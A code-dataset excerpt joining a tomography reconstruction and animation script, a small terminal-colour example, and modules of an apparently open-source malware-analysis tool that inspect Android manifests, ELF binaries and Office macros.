# grid.bgcolor = "#ffffff"
# Create a rotation transform:
# tr = MatrixTransform() #TODO: wait 0.5.0 to re-add MatrixTransform
# Let's record a .gif:
gif_file = Path("reconstruct_animation.mp4")
if gif_file.is_file():
print('reconstruct_animation.mp4 is already in the folder, please delete it to get a new one')
else:
print('Let\'s record a .mp4 of the reconstructed volume:')
n_steps = 450 # 360
step_angle = 0.8 # 1.
# [] #0.1 fail, 0, 1 fail, (0.5, 0.5, 0.5)ok
rotation_axis = np.array([0, 0, 1])
# rt=scene.AffineTransform()
#volume1.transform = rt
#volume1.transform.rotate(angle=step_angle, axis=rotation_axis)
#volume1.transform.translate([1, 1, 0])
axis.visible = False
#view.camera.set_range(x=[-3, 3])
writer = imageio.get_writer(
'reconstruct_animation.mp4', fps=50, quality=8)
# TODO: add a progress bar
gif_bar = progressbar.ProgressBar(
redirect_stdout=True, max_value=n_steps)
gif_bar.start()
for i in range(n_steps): # * 2):
im = canvas.render()
writer.append_data(im)
view.camera.transform.translate([1.8, -1.8, 0])
view.camera.transform.rotate(step_angle, rotation_axis)
#volume1.transform.rotate(angle=step_angle, axis=rotation_axis)
gif_bar.update(i)
gif_bar.finish()
writer.close()
axis.visible = True
# from https://stackoverflow.com/questions/5376837/how-can-i-do-an-if-run-from-ipython-test-in-python
def run_from_ipython():
try:
__IPYTHON__
print('Running inside IPython: Let\'s use VisPy Interactive mode')
return True
except NameError:
return False
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# - - - - - - - - - - - - - - IMPERATIVE PROGRAM - - - - - - - - - - - - - - - -
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
if __name__ == '__main__':
# Setting tomographic images size :
img_size = 256 # 256
# First we need to create or load the tomo matrix :
tomo_file = Path("TOMO_360_angle_images.pkl")
if tomo_file.is_file():
print('TOMO_360_angle_images.pkl is in the folder, let\'s load it:')
else:
get_images()
# Loading dataset
# , protocol=2)#protocol=2 for python2, 3 by defaut with python3
mat_360 = joblib.load('TOMO_360_angle_images.pkl')
print("TOMO_360_angle_images.pkl loaded !")
# Let's compute the inverse radon transform, reconstruct from all images
# from http://scikit-image.org/docs/dev/auto_examples/transform/plot_radon_transform.html
# Set data collection angles as equally spaced between 0-180 degrees.
# 0.9deg rotation between images
# for 180deg rotation, only taking images 1 to 201:
# total_rotation = 180 # 200 images *0.9deg, (full image set = 255 images * 0.9deg)
total_rotation = 360 # for 360deg imaging
nb_angles = int(total_rotation / 0.9)
# *2 because tomopy.angles() computes angles for a 180° rotation, not 360°
theta = tomopy.angles(nb_angles) * 2
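# e.g. 360 / 0.9 = 400 projections, each 0.9° apart over the full turn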
# Flat-field correction of raw data.
# proj = tomopy.normalize(proj, flat, dark) #NEED FLAT AND DARK VALUES
# norm_mat_180 = tomopy.normalize_bg(mat_180, theta) # Normalization from background TODO: FIX THIS PYTHON REBOOT!
norm_mat_360 = mat_360 / mat_360.mean() # simplest normalization
# Plotting raw measurements by angles:
raw_file = Path("Raw_360_angles.png")
if raw_file.is_file():
print('Raw_360_angles.png already in folder, please delete it to get a new one')
else:
sample_stack_Angles(mat_360, algo='Raw')
# Find rotation center #FAILURE - TODO: FIX THIS PYTHON REBOOT!
# rot_center = tomopy.find_center(sim, theta, init=125,# mask=True, #initial gess:256/2
# ind=0, tol=0.5)
#print("Center of rotation: ", rot_center)
# sim_log = tomopy.minus_log(mat_180) # TODO: Why use this ? Getting sim_log.max=inf...
# Simple reconstruct with ART algorithm:
# recon = tomopy.recon(mat_180, theta, algorithm='art')#, center=rot_center,)
# algorithm='bart'BOF, 'fbp'SUPERBOF, 'mlem'BOF, 'osem'BOF, 'ospml_hybrid'MOUAIS, 'ospml_quad'BOF, 'pml_hybrid'BOF, 'pml_quad'MOUAIS, 'sirt'MOUAIS
#filter_name = 'shepp', 'cosine', 'hann', 'hamming', 'ramlak', 'parzen', 'butterworth'
# recon is (z, x, y)
# masked_recon = tomopy.circ_mask(recon, axis=0, ratio=0.9)
# plt.imshow(masked_recon[:,120,:], cmap=plt.cm.Greys_r)
# plt.show()
# Reconstructing with all avaible algorithms :
recon_file = Path("360_recon_all_algo_noCentering.pkl")
if recon_file.is_file():
print('360_recon_all_algo_noCentering.pkl is in the folder, let\'s load it')
recon_algos = joblib.load('360_recon_all_algo_noCentering.pkl')
recon = recon_algos[0] # select ART algorithm
else:
# We only keep algorithms which lead to differences in the reconstruction:
# ,'ospml_hybrid', 'pml_hybrid', 'bart', 'mlem', 'osem'}
algorithms = {'art', 'fbp', 'sirt', 'ospml_quad', 'pml_quad'}
print('Let\'s reconstruct with: ' + format(algorithms) + ' algorithms')
# Display a progressbar
bar = progressbar.ProgressBar(redirect_stdout=True, term_width=2, max_value=len(
algorithms) * 15) # widgets=[progressbar.Bar('=', '[', ']'), ' ', progressbar.Percentage()]
bar.start()
start = time.time()
recon_algos = []
i = 0
for algo in algorithms:
# , center=rot_center,)
recon = tomopy.recon(mat_360, theta, algorithm=algo)
i = i + 10
bar.update(i)
# Plotting reconstructed projections by angles
sample_stack_proj_Angles(recon, theta, algo=algo)
i = i + 4
bar.update(i)
# Plotting reconstructed Z slices by Y height
sample_stack_Z(recon, algo=algo)
recon_algos.append(recon)
i = i + 1
bar.update(i)
bar.finish()
joblib.dump(recon_algos, '360_recon_all_algo_noCentering.pkl') # 20 Mo
end = time.time()
print("Done in " + str(end - start) + "ms")
recon = recon_algos[0] # select ART algorithm
# 3D rotational animation :
print('Let\'s display the reconstructed 3D volume')
# Using VisPy as I can't compile VTK 8.0.0 : http://vispy.org/plot.html
# print(vispy.sys_info())
# https://github.com/vispy/vispy/blob/master/examples/basics/scene/volume.py
"""
Example volume rendering
Controls:
* ESC - to quit
* 1 - toggle camera between first person (fly), regular 3D (turntable) and
arcball
* 2 - toggle between volume rendering methods
* 3 - toggle between stent-CT / brain-MRI image
* 4 - toggle between colormaps
* 0 - reset cameras
* [] - decrease/increase isosurface threshold
With fly camera:
* WASD or arrow keys - move around
* SPACE - brake
* FC - move up-down
* IJKL or mouse - look around
"""
# if run_from_ipython():
# #app.use_app('glfw') # for testing specific backends
# app.set_interactive() #to use in IPython
# scene_building()
# # All variables listed in this scope are accessible via the console.
# #app.Timer(interval=0.0, connect=None, iterations=-1, start=True)#, app=None)
# #app.Timer('auto', connect=on_timer(), start=True) #TODO
# # In IPython, try typing any of the following:
# # canvas.color = (1.0, 0.0, 0.0)
# canvas.color = 'white'#'red'
# canvas.show()
# else:
print(__doc__)
# 'ql+' If PyOpenGL is not available please use gl='gl2'
vispy.use(app='glfw', gl='gl2')
# app='PyQt5'(framebuffer quarter on HiDPi), 'pyglet'(slow, bug), 'glfw',
scene_building(recon_algos)
app.run()
# # VisPy point by point = SLOW AS HELL - - - - - - - - - - - - - - - - - - - -
# #from https://github.com/vispy/vispy/issues/1189
# # build your visuals
# Scatter3D = scene.visuals.create_visual_node(visuals.MarkersVisual)
#
# # The real-things : plot using scene
# # build canvas
# canvas = scene.SceneCanvas(keys='interactive', show=True)
#
# # Add a ViewBox to let the user zoom/rotate
# view = canvas.central_widget.add_view()
# view.camera = 'turntable'
# view.camera.fov = 45
# view.camera.distance = 300 #500
#
# n = recon.size #near 16 millions points: 256*256*256=16777216
# pos = np.zeros((n, 3))
# for i in range(0,recon.shape[0]):
# for j in range(0,recon.shape[1]):
# for k in range(0,recon.shape[2]):
# pos[i+j+k] = (i,j,k)
#
# #xyz = []
# #xyz = np.mgrid[0:recon.shape[0], 0:recon.shape[1], 0:recon.shape[2]]
# #xyz.append(np.arange(0,215,1))
#
# colors = np.ones((n, 4), dtype=np.float32)
# norm = plt.Normalize()
# colors = plt.cm.jet(norm(recon.reshape(-1)))
#
# # plot
# p1 = Scatter3D(parent=view.scene)
# p1.set_gl_state('translucent', blend=True, depth_test=True)
# p1.set_data(pos, face_color=colors)
# p1.symbol = visuals.marker_types[10]
#
# # run
# app.run()
# 3D visualization using matplotlib... slow ! - - - - - - - - - - - - - - - - -
# import itertools
# from mpl_toolkits.mplot3d import axes3d
# from matplotlib import animation
#
# N = 10 # nb of images
#
# fig = plt.figure()
# ax = fig.add_subplot(111, projection='3d')
# #ax = plt.figure().gca(projection='3d')
# ax.set_xlabel('X')
# ax.set_ylabel('Y')
# ax.set_zlabel('Z')
# #pcm = ax.pcolormesh(x, y, Z, vmin=-1., vmax=1., cmap='RdBu_r')
#
# # load some test data for demonstration and plot a wireframe
# #X, Y, Z = axes3d.get_test_data(0.1)
# #ax.plot_wireframe(X, Y, Z, rstride=5, cstride=5)
#
# recon[:,:,-1].shape
#
# xyz = recon.reshape(-1)
# xyz = plt.cm.Greys_r(xyz)
#
# x = np.linspace(0,256, 256)
# y = np.linspace(0,256, 256)
# z = np.linspace(0,256, 256)
# points = []
# for element in itertools.product(x, y, z):
# points.append(element)
# fxyz = map(xyz, points)
# xi, yi, zi = zip(*points)
#
# ax.scatter(xi, yi, zi, c=fxyz, alpha=0.5) #,cmap=plt.cm.Greys_r
# fig.tight_layout()
# plt.show()
#
# # rotate the axes and update
# #for angle in range(0, 360):
# # ax.view_init(30, angle)
# # plt.draw()
# # plt.pause(.001)
#
# def update(num):
# ax.view_init(30, num*(360/N))
#
# ani = animation.FuncAnimation(fig, update, N, interval=10000/N, blit=False)
# ani.save('matplot002.gif', writer='imagemagick')
#
#
#
#
# import mpl_toolkits.mplot3d.axes3d as p3
# from matplotlib import animation
#
# fig = plt.figure()
# ax = p3.Axes3D(fig)
#
# def gen(n):
# phi = 0
# nb_rotation = 1
# while phi < nb_rotation*np.pi:
# yield np.array([np.cos(phi), np.sin(phi), phi])
# phi += nb_rotation*np.pi/n
#
# def update(num, data, line):
# line.set_data(data[:2, :num])
# line.set_3d_properties(data[2, :num])
#
# N = 100
# data = np.array(list(gen(N))).T
# line, = ax.plot(data[0, 0:1], data[1, 0:1], data[2, 0:1])
#
# # Setting the axes properties
# ax.set_xlim3d([-1.0, 1.0])
# ax.set_xlabel('X')
#
# ax.set_ylim3d([-1.0, 1.0])
# ax.set_ylabel('Y')
#
# ax.set_zlim3d([0.0, 10.0])
# ax.set_zlabel('Z')
#
# ani = animation.FuncAnimation(fig, update, N, fargs=(data, line), interval=10000/N, blit=False)
# #ani.save('matplot003.gif', writer='imagemagick')
# plt.show()
#
#
# # - - - - - -
# # Visualization :
#
# from skimage import measure
# from mpl_toolkits.mplot3d import Axes3D
# from mpl_toolkits.mplot3d.art3d import Poly3DCollection
# def make_mesh(image, threshold=-300, step_size=1):
# print("Transposing surface")
# #p = image.transpose(2,1,0) #TODO: don't transpose as we have (x, y, z) images
# p = image.transpose(0,2,1) # simply inverse X and Y
#
# print("Calculating surface")
# verts, faces, norm, val = measure.marching_cubes(p, threshold, step_size=step_size, allow_degenerate=True)
# return verts, faces
#
# def plotly_3d(verts, faces):
# x,y,z = zip(*verts)
# print("Drawing")
# # Make the colormap single color since the axes are positional not intensity.
# #colormap=['rgb(255,105,180)','rgb(255,255,51)','rgb(0,191,255)']
# colormap=['rgb(236, 236, 212)','rgb(236, 236, 212)']
#
# fig = FF.create_trisurf(x=x,
# y=y,
# z=z,
# plot_edges=False,
# colormap=colormap,
# simplices=faces,
# backgroundcolor='rgb(64, 64, 64)',
# title="Interactive Visualization")
# iplot(fig)
#
# def plt_3d(verts, faces):
# print("Drawing")
# x,y,z = zip(*verts)
# fig = plt.figure(figsize=(10, 10))
# ax = fig.add_subplot(111, projection='3d')
#
# # Fancy indexing: `verts[faces]` to generate a collection of triangles
# mesh = Poly3DCollection(verts[faces], linewidths=0.05, alpha=1)
# face_color = [1, 1, 0.9]
# mesh.set_facecolor(face_color)
# ax.add_collection3d(mesh)
#
# ax.set_xlim(0, max(x))
# ax.set_ylim(0, max(y))
# ax.set_zlim(0, max(z))
# ax.set_axis_bgcolor((0.7, 0.7, 0.7))
# plt.show()
# v, f = make_mesh(recon, 0)#
# plt_3d(v, f)
#
#
#
#
#
# #Animation from : http://jakevdp.github.io/blog/2012/08/18/matplotlib-animation-tutorial/
# from matplotlib import animation
# # First set up the figure, the axis, and the plot element we want to animate
# fig = plt.figure()
# ax = plt.axes(xlim=(0, 255), ylim=(0, 255))
# line, = ax.plot([], [], lw=2)
#
# # initialization function: plot the background of each frame
# def init():
# line.set_data([], [])
# return line,
#
# # animation function. This is called sequentially
# def animate(i):
# x = np.linspace(0, 2, 1000)
# y = np.sin(2 * np.pi * (x - 0.01 * i))
# line.set_data(x, y)
# return line,
#
# # call the animator. blit=True means only re-draw the parts that have changed.
# anim = animation.FuncAnimation(fig, animate, init_func=init,
# frames=200, interval=20, blit=True)
#
# # save the animation as an mp4. This requires ffmpeg or mencoder to be
# # installed. The extra_args ensure that the x264 codec is used, so that
# # the video can be embedded in html5. You may need to adjust this for
# # your system: for more information, see
# # http://matplotlib.sourceforge.net/api/animation_api.html
# anim.save('basic_animation.mp4', fps=30, extra_args=['-vcodec', 'libx264'])
# plt.show()
``` |
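For reference, the core tomopy pipeline the script leans on can be exercised end-to-end on a synthetic phantom; a minimal sketch, assuming tomopy is installed:
```python
import tomopy

obj = tomopy.shepp3d(size=64)       # synthetic 3D phantom, shape (z, x, y)
theta = tomopy.angles(90)           # 90 projection angles over 0..180 degrees
proj = tomopy.project(obj, theta)   # forward-project into sinograms
recon = tomopy.recon(proj, theta, algorithm='art')
recon = tomopy.circ_mask(recon, axis=0, ratio=0.9)
print(recon.shape)
```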
{
"source": "A1rPun/GarterLine",
"score": 3
} |
#### File: A1rPun/GarterLine/example.py
```python
from garterline import GarterLine
def example1():
line = GarterLine()
line.color("red")
line.text("Hello")
line.color("blue")
line.text("World")
return line
def example2():
percentReady90 = ["In", "other", "words", "it's", "almost", "completed"]
line = GarterLine()
line.color("blue", "green")
line.text(" ░ ".join(percentReady90))
return line
def example3():
line = GarterLine()
line.color("black", "blue")
line.text("SyntaxError")
line.color(background="lightblue")
line.text("(unicode error) 'unicodeescape'")
line.color(background="cyan")
line.text("codec can't decode bytes in position 0-1")
line.color(background="lightcyan")
line.text("truncated \\uXXXX escape")
return line
def clear(msg=""):
return GarterLine().text(msg).color()
#"Lisää viinaa silmät liikkuu :)"
print(clear("GarterLine examples"))
print(example1())
print(example2())
print(example3())
print(clear())
``` |
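The `clear()` helper shows the calls chain; assuming `color()` also returns the line (as its use in `clear()` suggests), one more sketch using only the `text`/`color` methods shown above:
```python
def example4():
    return GarterLine().text("branch:").color("green").text("master").color()

print(example4())
```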
{
"source": "A1S0N/Qu1cksc0pe",
"score": 3
} |
#### File: Qu1cksc0pe/Modules/apkSecCheck.py
```python
import sys
import xml.etree.ElementTree as etr
try:
from prettytable import PrettyTable
except:
print("Error: >prettytable< module not found.")
sys.exit(1)
try:
from colorama import Fore, Style
except:
print("Error: >colorama< module not found.")
sys.exit(1)
# Colors
red = Fore.LIGHTRED_EX
cyan = Fore.LIGHTCYAN_EX
white = Style.RESET_ALL
green = Fore.LIGHTGREEN_EX
yellow = Fore.LIGHTYELLOW_EX
magenta = Fore.LIGHTMAGENTA_EX
# Legends
infoS = f"{cyan}[{red}*{cyan}]{white}"
errorS = f"{cyan}[{red}!{cyan}]{white}"
def ManifestAnalysis():
# Obtaining manifest file
try:
manifest_path = "TargetAPK/resources/AndroidManifest.xml"
manifest_tree = etr.parse(manifest_path)
manifest_root = manifest_tree.getroot()
except FileNotFoundError:
print(f"{errorS} An error occured while parsing {green}AndroidManifest.xml{white}. Did your APK file decompiled correctly?")
sys.exit(1)
# Gathering information
app_data = manifest_root.findall("application")
perm_data = manifest_root.findall("permission")
# General information
sec_dict = {
"{http://schemas.android.com/apk/res/android}debuggable": "No entry found.",
"{http://schemas.android.com/apk/res/android}usesCleartextTraffic": "No entry found.",
"{http://schemas.android.com/apk/res/android}allowBackup": "No entry found.",
"{http://schemas.android.com/apk/res/android}networkSecurityConfig": f"{red}Not found{white}"
}
# Check for values
print(f"\n{infoS} Checking basic security options...")
for sec in sec_dict:
if sec in app_data[0].keys():
if sec == "{http://schemas.android.com/apk/res/android}networkSecurityConfig":
sec_dict[sec] = f"{green}Found{white}"
else:
if app_data[0].attrib[sec] == "false":
sec_dict[sec] = f"{green}Secure{white}"
else:
sec_dict[sec] = f"{red}Insecure{white}"
# Tables!!
reportTable = PrettyTable()
reportTable.field_names = [f"{yellow}Debuggable{white}", f"{yellow}AllowBackup{white}", f"{yellow}ClearTextTraffic{white}", f"{yellow}NetworkSecurityConfig{white}"]
reportTable.add_row(
[
sec_dict['{http://schemas.android.com/apk/res/android}debuggable'],
sec_dict['{http://schemas.android.com/apk/res/android}allowBackup'],
sec_dict['{http://schemas.android.com/apk/res/android}usesCleartextTraffic'],
sec_dict['{http://schemas.android.com/apk/res/android}networkSecurityConfig']
]
)
print(reportTable)
# Check for permission flags
permLevel = "No entry found."
print(f"\n{infoS} Checking application permission flags...")
try:
if "{http://schemas.android.com/apk/res/android}protectionLevel" in perm_data[0].keys():
if perm_data[0].attrib["{http://schemas.android.com/apk/res/android}protectionLevel"] == "signature" or perm_data[0].attrib["{http://schemas.android.com/apk/res/android}protectionLevel"] == "signatureOrSystem":
permLevel = f"{green}{perm_data[0].attrib['{http://schemas.android.com/apk/res/android}protectionLevel']}{white}"
else:
permLevel = f"{red}{perm_data[0].attrib['{http://schemas.android.com/apk/res/android}protectionLevel']}{white}"
permTable = PrettyTable()
permTable.field_names = [f"{yellow}Permission{white}", f"{yellow}Flag{white}"]
permTable.add_row(
[
perm_data[0].attrib["{http://schemas.android.com/apk/res/android}name"],
permLevel
]
)
print(permTable)
except IndexError:
print(f"{errorS} There is no entry about permission flags.")
# Exported activities
exp_indicator = 0
print(f"\n{infoS} Searching for exported activities...")
# Pretty output
actTable = PrettyTable()
actTable.field_names = [f"{yellow}Activity{white}", f"{yellow}Exported{white}"]
for tags in range(0, len(app_data[0])):
if app_data[0][tags].tag == "activity":
if "{http://schemas.android.com/apk/res/android}exported" in app_data[0][tags].keys():
if app_data[0][tags].get("{http://schemas.android.com/apk/res/android}exported") == "true":
actTable.add_row(
[
app_data[0][tags].get('{http://schemas.android.com/apk/res/android}name'),
f"{red}{app_data[0][tags].get('{http://schemas.android.com/apk/res/android}exported')}{white}"
]
)
exp_indicator += 1
else:
actTable.add_row(
[
app_data[0][tags].get('{http://schemas.android.com/apk/res/android}name'),
f"{green}{app_data[0][tags].get('{http://schemas.android.com/apk/res/android}exported')}{white}"
]
)
exp_indicator += 1
if exp_indicator == 0:
print(f"{errorS} There is no entry about exported activites.")
else:
print(actTable)
# Exported providers
pro_indicator = 0
print(f"\n{infoS} Searching for exported providers...")
# Pretty output
proTable = PrettyTable()
proTable.field_names = [f"{yellow}Provider{white}", f"{yellow}Exported{white}"]
for tags in range(0, len(app_data[0])):
if app_data[0][tags].tag == "provider":
if "{http://schemas.android.com/apk/res/android}exported" in app_data[0][tags].keys():
if app_data[0][tags].get("{http://schemas.android.com/apk/res/android}exported") == "true":
proTable.add_row(
[
app_data[0][tags].get('{http://schemas.android.com/apk/res/android}name'),
f"{red}{app_data[0][tags].get('{http://schemas.android.com/apk/res/android}exported')}{white}"
]
)
pro_indicator += 1
else:
proTable.add_row(
[
app_data[0][tags].get('{http://schemas.android.com/apk/res/android}name'),
f"{green}{app_data[0][tags].get('{http://schemas.android.com/apk/res/android}exported')}{white}"
]
)
pro_indicator += 1
if pro_indicator == 0:
print(f"{errorS} There is no entry about exported providers.")
else:
print(proTable)
# Execution
ManifestAnalysis()
```
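The namespace handling above is the fiddly part of manifest parsing; a self-contained sketch of the same Clark-notation lookup on a toy manifest:
```python
import xml.etree.ElementTree as etr

ANDROID = "{http://schemas.android.com/apk/res/android}"
xml = ('<manifest xmlns:android="http://schemas.android.com/apk/res/android">'
       '<application android:debuggable="true"/></manifest>')
root = etr.fromstring(xml)
app = root.find("application")
print(app.get(ANDROID + "debuggable"))  # -> "true"
```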
#### File: Qu1cksc0pe/Modules/languageDetect.py
```python
import sys
try:
import puremagic as pr
except:
print("Error: >puremagic< module not found.")
sys.exit(1)
try:
from colorama import Fore, Style
except:
print("Error: >colorama< module not found.")
sys.exit(1)
# Getting name of the file for executable checker function
fileName = str(sys.argv[1])
# Colors
red = Fore.LIGHTRED_EX
cyan = Fore.LIGHTCYAN_EX
white = Style.RESET_ALL
green = Fore.LIGHTGREEN_EX
magenta = Fore.LIGHTMAGENTA_EX
# Legends
infoS = f"{cyan}[{red}*{cyan}]{white}"
errorS = f"{cyan}[{red}!{cyan}]{white}"
foundS = f"{cyan}[{red}+{cyan}]{white}"
# All strings
allStrings = open("temp.txt", "r").read().split("\n")
# Strings for identifying programming language
detector = {"Golang": ["GODEBUG", "runtime.goexit", "runtime.gopanic"],
"Nim": ["echoBinSafe", "nimFrame", "stdlib_system.nim.c", "nimToCStringConv"],
"Python": ["_PYI_PROCNAME", "Py_BuildValue", "Py_Initialize", "__main__", "pydata", "libpython3.9.so.1.0", "py_compile"],
"Zig": ["ZIG_DEBUG_COLOR", "__zig_probe_stack", "__zig_return_error", "ZIG"],
"C#": ["#GUID", "</requestedPrivileges>", "<security>", "mscoree.dll", "System.Runtime", "</assembly>", ".NET4.0E", "_CorExeMain"],
"C++": ["std::", "libstdc++.so.6", "GLIBCXX_3.4.9", "CXXABI_1.3.9"],
"C": ["__libc_start_main", "GLIBC_2.2.5", "libc.so.6", "__cxa_finalize", ".text"]
} # TODO: Look for better solutions instead of strings!!
# This function scans special strings in binary files
def LanguageDetect():
print(f"{infoS} Performing language detection. Please wait!!")
# Basic string scan :)
indicator = 0
for key in detector:
for val in detector[key]:
if val in allStrings:
print(f"{foundS} Possible programming language: {green}{key}{white}\n")
indicator += 1
sys.exit(0)
if indicator == 0:
print(f"{errorS} Programming language couldn\'t detected :(\n")
sys.exit(1)
# This function analyses whether the given file is an executable file
def ExecutableCheck(fileName):
exe_indicator = 0
try:
magicNums = list(pr.magic_file(fileName))
for mag in range(0, len(magicNums)):
if magicNums[mag].confidence >= 0.4:
if "executable" in str(magicNums[mag].name) or "Executable" in str(magicNums[mag].name):
exe_indicator += 1
if exe_indicator != 0:
return True
else:
return False
    except Exception:
        # puremagic can raise on unreadable or unknown files; treat as non-executable
        return False
# Execution
if ExecutableCheck(fileName) == True:
LanguageDetect()
else:
print(f"{errorS} Please scan executable files.\n")
sys.exit(1)
```
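Note that `val in allStrings` above is an exact-line membership test against the strings dump, so a marker like `std::` only matches when it occupies a whole line. A hedged alternative sketch (an assumption, not the project's implementation) that scores substring hits per language instead:

```python
def detect_language(all_strings, detector):
    # Join the dump once, then count marker substrings per language.
    blob = "\n".join(all_strings)
    hits = {lang: sum(1 for marker in markers if marker in blob)
            for lang, markers in detector.items()}
    best = max(hits, key=hits.get)
    return best if hits[best] > 0 else None
```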
#### File: Qu1cksc0pe/Modules/linAnalyzer.py
```python
import os
import sys
import json
try:
    from prettytable import PrettyTable
except ImportError:
    print("Error: >prettytable< module not found.")
    sys.exit(1)
try:
    import puremagic as pr
except ImportError:
    print("Error: >puremagic< module not found.")
    sys.exit(1)
try:
    from colorama import Fore, Style
except ImportError:
    print("Error: >colorama< module not found.")
    sys.exit(1)
# Getting name of the file for statistics
fileName = str(sys.argv[1])
# Colors
red = Fore.LIGHTRED_EX
cyan = Fore.LIGHTCYAN_EX
white = Style.RESET_ALL
green = Fore.LIGHTGREEN_EX
yellow = Fore.LIGHTYELLOW_EX
# Legends
errorS = f"{cyan}[{red}!{cyan}]{white}"
infoS = f"{cyan}[{red}*{cyan}]{white}"
# Gathering Qu1cksc0pe path variable
sc0pe_path = open(".path_handler", "r").read()
# Wordlists
allStrings = open("temp.txt", "r").read().split("\n")
allThings = open("elves.txt", "r").read()
sections = open(f"{sc0pe_path}/Systems/Linux/sections.txt", "r").read().split("\n")
segments = open(f"{sc0pe_path}/Systems/Linux/segments.txt", "r").read().split("\n")
networkz = open(f"{sc0pe_path}/Systems/Linux/Networking.txt", "r").read().split("\n")
filez = open(f"{sc0pe_path}/Systems/Linux/Files.txt", "r").read().split("\n")
procesz = open(f"{sc0pe_path}/Systems/Linux/Processes.txt", "r").read().split("\n")
memoryz = open(f"{sc0pe_path}/Systems/Linux/Memory.txt", "r").read().split("\n")
infogaz = open(f"{sc0pe_path}/Systems/Linux/Infoga.txt", "r").read().split("\n")
persisz = open(f"{sc0pe_path}/Systems/Linux/Persistence.txt", "r").read().split("\n")
cryptoz = open(f"{sc0pe_path}/Systems/Linux/Crypto.txt", "r").read().split("\n")
otherz = open(f"{sc0pe_path}/Systems/Linux/Others.txt", "r").read().split("\n")
# Categories
Networking = []
File = []
Process = []
Memory = []
Information_Gathering = []
System_Persistence = []
Cryptography = []
Other = []
# Scores
scoreDict = {
"Networking": 0,
"File": 0,
"Process": 0,
"Memory Management": 0,
"Information Gathering": 0,
"System/Persistence": 0,
"Cryptography": 0,
"Other/Unknown": 0
}
# Dictionary of categories
Categs = {
"Networking": Networking,
"File": File,
"Process": Process,
"Memory Management": Memory,
"Information Gathering": Information_Gathering,
"System/Persistence": System_Persistence,
"Cryptography": Cryptography,
"Other/Unknown": Other
}
# Dictionary of arrays
dictArr = {
"Networking": networkz,
"File": filez,
"Process": procesz,
"Memory Management": memoryz,
"Information Gathering": infogaz,
"System/Persistence": persisz,
"Cryptography": cryptoz,
"Other/Unknown": otherz
}
# Defining function
def Analyzer():
allFuncs = 0
tables = PrettyTable()
secTable = PrettyTable()
segTable = PrettyTable()
resTable = PrettyTable()
statistics = PrettyTable()
for key in dictArr:
for elem in dictArr[key]:
if elem in allStrings:
if elem != "":
Categs[key].append(elem)
allFuncs +=1
for key in Categs:
if Categs[key] != []:
if key == "Information Gathering" or key == "System/Persistence" or key == "Cryptography":
print(f"\n{yellow}[{red}!{yellow}]__WARNING__[{red}!{yellow}]{white}")
# Printing zone
tables.field_names = [f"Functions or Strings about {green}{key}{white}"]
for i in Categs[key]:
if i == "":
pass
else:
tables.add_row([f"{red}{i}{white}"])
            # Threat score: every populated category counts once
            scoreDict[key] += 1
print(tables)
tables.clear_rows()
# Gathering sections and segments
secTable.field_names = [f"{green}Sections{white}"]
segTable.field_names = [f"{green}Segments{white}"]
# Sections
sec_indicator = 0
for se1 in sections:
if se1 in allThings:
if se1 != "":
secTable.add_row([f"{red}{se1}{white}"])
sec_indicator += 1
if sec_indicator != 0:
print(secTable)
# Segments
seg_indicator = 0
for se2 in segments:
if se2 in allThings:
if se2 != "":
segTable.add_row([f"{red}{se2}{white}"])
seg_indicator += 1
if seg_indicator != 0:
print(segTable)
# Resource scanner zone
print(f"\n{infoS} Performing magic number analysis...")
resCounter = 0
resTable.field_names = [f"File Extensions", "Names", "Byte Matches", "Confidence"]
resourceList = list(pr.magic_file(fileName))
for res in range(0, len(resourceList)):
extrExt = str(resourceList[res].extension)
extrNam = str(resourceList[res].name)
extrByt = str(resourceList[res].byte_match)
if resourceList[res].confidence >= 0.4:
resCounter += 1
if extrExt == '':
resTable.add_row([f"{red}No Extension{white}", f"{red}{extrNam}{white}", f"{red}{extrByt}{white}", f"{red}{resourceList[res].confidence}{white}"])
else:
resTable.add_row([f"{red}{extrExt}{white}", f"{red}{extrNam}{white}", f"{red}{extrByt}{white}", f"{red}{resourceList[res].confidence}{white}"])
if len(resourceList) != 0:
print(resTable)
# Statistics zone
print(f"\n{green}->{white} Statistics for: {green}{fileName}{white}")
# Printing zone
statistics.field_names = ["Categories", "Number of Functions"]
statistics.add_row([f"{green}All Functions{white}", f"{green}{allFuncs}{white}"])
for key in scoreDict:
if scoreDict[key] == 0:
pass
else:
if key == "System/Persistence" or key == "Cryptography" or key == "Information Gathering":
statistics.add_row([f"{yellow}{key}{white}", f"{red}{scoreDict[key]}{white}"])
else:
statistics.add_row([f"{white}{key}", f"{scoreDict[key]}{white}"])
print(statistics)
# Warning about obfuscated file
if allFuncs < 10:
print(f"\n{errorS} This file might be obfuscated or encrypted. Try {green}--packer{white} to scan this file for packers.\n")
sys.exit(0)
# Execute
try:
    Analyzer()
except Exception:
    pass
finally:
    # Always clean up the temporary ELF dump, even if Analyzer() exits early
    if os.path.exists("Modules/elves.txt"):
        os.remove("Modules/elves.txt")
```
#### File: Qu1cksc0pe/Modules/nonExecAnalyzer.py
```python
import os
import sys
# Checking for puremagic
try:
    import puremagic as pr
except ImportError:
    print("Error: >puremagic< module not found.")
    sys.exit(1)
# Checking for colorama
try:
    from colorama import Fore, Style
except ImportError:
    print("Error: >colorama< module not found.")
    sys.exit(1)
# Checking for prettytable
try:
    from prettytable import PrettyTable
except ImportError:
    print("Error: >prettytable< module not found.")
    sys.exit(1)
# Checking for oletools
try:
    from oletools.olevba import VBA_Parser
    from oletools.crypto import is_encrypted
    from oletools.oleid import OleID
    from olefile import isOleFile
except ImportError:
    print("Error: >oletools< module not found.")
    print("Try 'sudo -H pip3 install -U oletools' command.")
    sys.exit(1)
# Colors
red = Fore.LIGHTRED_EX
cyan = Fore.LIGHTCYAN_EX
white = Style.RESET_ALL
green = Fore.LIGHTGREEN_EX
yellow = Fore.LIGHTYELLOW_EX
magenta = Fore.LIGHTMAGENTA_EX
# Legends
infoS = f"{cyan}[{red}*{cyan}]{white}"
errorS = f"{cyan}[{red}!{cyan}]{white}"
# Target file
targetFile = str(sys.argv[1])
# A function that finds VBA Macros
def MacroHunter(targetFile):
answerTable = PrettyTable()
answerTable.field_names = [f"{green}Threat Levels{white}", f"{green}Macros{white}", f"{green}Descriptions{white}"]
print(f"\n{infoS} Looking for VBA Macros...")
try:
fileData = open(targetFile, "rb").read()
vbaparser = VBA_Parser(targetFile, fileData)
macroList = list(vbaparser.analyze_macros())
if vbaparser.contains_macros == True:
for fi in range(0, len(macroList)):
if macroList[fi][0] == 'Suspicious':
